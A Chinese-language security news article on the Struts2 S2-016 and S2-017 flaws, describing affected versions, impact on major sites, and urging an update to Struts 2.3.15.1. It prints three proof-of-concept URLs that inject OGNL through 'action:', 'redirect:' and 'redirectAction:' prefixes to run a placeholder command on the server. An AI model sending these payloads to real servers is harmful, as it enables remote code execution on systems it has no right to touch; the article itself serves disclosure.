Struts2 兩大高危安全漏洞,網站安全再受考驗
近日,Struts2 被曝出兩個高危安全漏洞,影響的版本Struts 2.0.0 – Struts 2.3.15的 Struts2 全系版本,國內政府、金融、運營商及各大網際網路公司的網站已受影響。
一個是使用縮寫的導航引數字首時的遠端程式碼執行漏洞,另一個是使用縮寫的重定向引數字首時的開放式重定向漏洞。這些漏洞可使黑客取得網站伺服器的“最高許可權”,從而使企業伺服器變成黑客手中的“肉雞”。
Struts漏洞影響巨大,受影響站點以電商、銀行、門戶、政府居多,而且一些自動化、傻瓜化的利用工具開始出現,填入地址可直接執行伺服器命令,讀取資料甚至直接關機等操作。據烏雲平臺漏洞報告,淘寶、京東、騰訊等大型網際網路廠商均受此影響。
瞭解Struts:
Struts 是Apache軟體基金會(ASF)贊助的一個開源專案。它最初是Jakarta專案中的一個子專案,並在2004年3月成為ASF的頂級專案。它通過採用 JavaServlet/JSP 技術,實現了基於 Java EEWeb 應用的MVC設計模式的應用框架,是MVC經典設計模式中的一個經典產品。使用Struts的目的是為了幫助我們減少在運用MVC設計模型來開發Web應用的時間。
詳細介紹下 Struts2 的兩大安全漏洞:
1. 通過在引數前面加上“action:”/“redirect:”/“redirectAction:”字首,以實現遠端程式碼執行,如下:
1 |
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} |
2 |
3 |
4 |
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} |
5 |
6 |
7 |
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} |
2. 通過在引數前面加上“redirect:”/“redirectAction:”字首,以實現開放式重定向,如下:
詳細漏洞資訊:
http://struts.apache.org/release/2.3.x/docs/s2-016.htmlhttp://struts.apache.org/release/2.3.x/docs/s2-017.html
http://struts.apache.org/release/2.3.x/docs/version-notes-23151.html
Struts2 官網:http://struts.apache.org/
為了網站和使用者的安全,儘快更新到Struts 2.3.15.1安全版本吧。
相關文章
- 網站的安全漏洞網站
- 系統裡存在安全漏洞的九大高危區域
- 滲透測試網站安全漏洞檢測大體方法網站
- 區塊鏈平臺EOS現系列高危安全漏洞區塊鏈
- 機器人也飽受安全漏洞折磨機器人
- 網站安全漏洞之SESSION防跨站攻擊獲取網站Session
- Rails框架再爆嚴重安全漏洞AI框架
- 經驗分享 | 網路安全漏洞分析者之路
- 【網路安全】最常見的六大安全漏洞!
- PHP網站常見安全漏洞及防禦方法PHP網站
- Oracle 11gR2高危許可權安全漏洞解決Oracle
- 錢包網站安全漏洞測試服務詳情網站
- Ingress Nginx 接連披露高危安全漏洞,是否有更好的選擇?Nginx
- 網站安全漏洞測試對抓包嗅探埠講解網站
- APP網站安全漏洞檢測服務的詳細介紹APP網站
- 如何檢測網站的安全漏洞?常見方法是什麼?網站
- 安全漏洞問題3:跨站指令碼指令碼
- 修正phpBB 2.0.x兩個安全漏洞 (轉)PHP
- GoAheadWeb伺服器曝安全漏洞,上萬臺物聯網裝置受影響GoWeb伺服器
- 過去20年重塑網路安全形式的6大安全漏洞
- 盤點 | 2021年十大網路安全漏洞
- Docker再曝安全漏洞,這次是PWD的問題Docker
- 後疫情時代遠端辦公安全性受考驗 騰訊安全提供遠端訪問更優解
- 只有“全”才有“安” 網路安全問題在兩會上受關注
- 兩會報導大資料:近9成網路受眾用手機看兩會大資料
- Microsoft SQL Server 2016 with SP3 GDR 釋出,修復高危安全漏洞ROSSQLServer
- 利用PHP擴充套件Taint找出網站的潛在安全漏洞實踐PHP套件AI網站
- Sql語句密碼驗證安全漏洞(轉)SQL密碼
- 團購網站的兩大制勝法寶薦網站
- 胡傳平:“大資料”時代考問網路安全大資料
- 認證考試網站網站
- 網路安全成步入高危期政府打出安全組合拳
- 網站安全網站
- WordPress4.9最新版本網站安全漏洞詳情與修復網站
- 寧夏200餘家單位網站查出1.7萬餘個安全漏洞網站
- 十大惡劣的網站體驗網站
- 獨家發現Chrome四大“高危”漏洞,360再獲谷歌官方致謝Chrome谷歌
- Bad Rabbit病毒肆虐,裝置共享備受考驗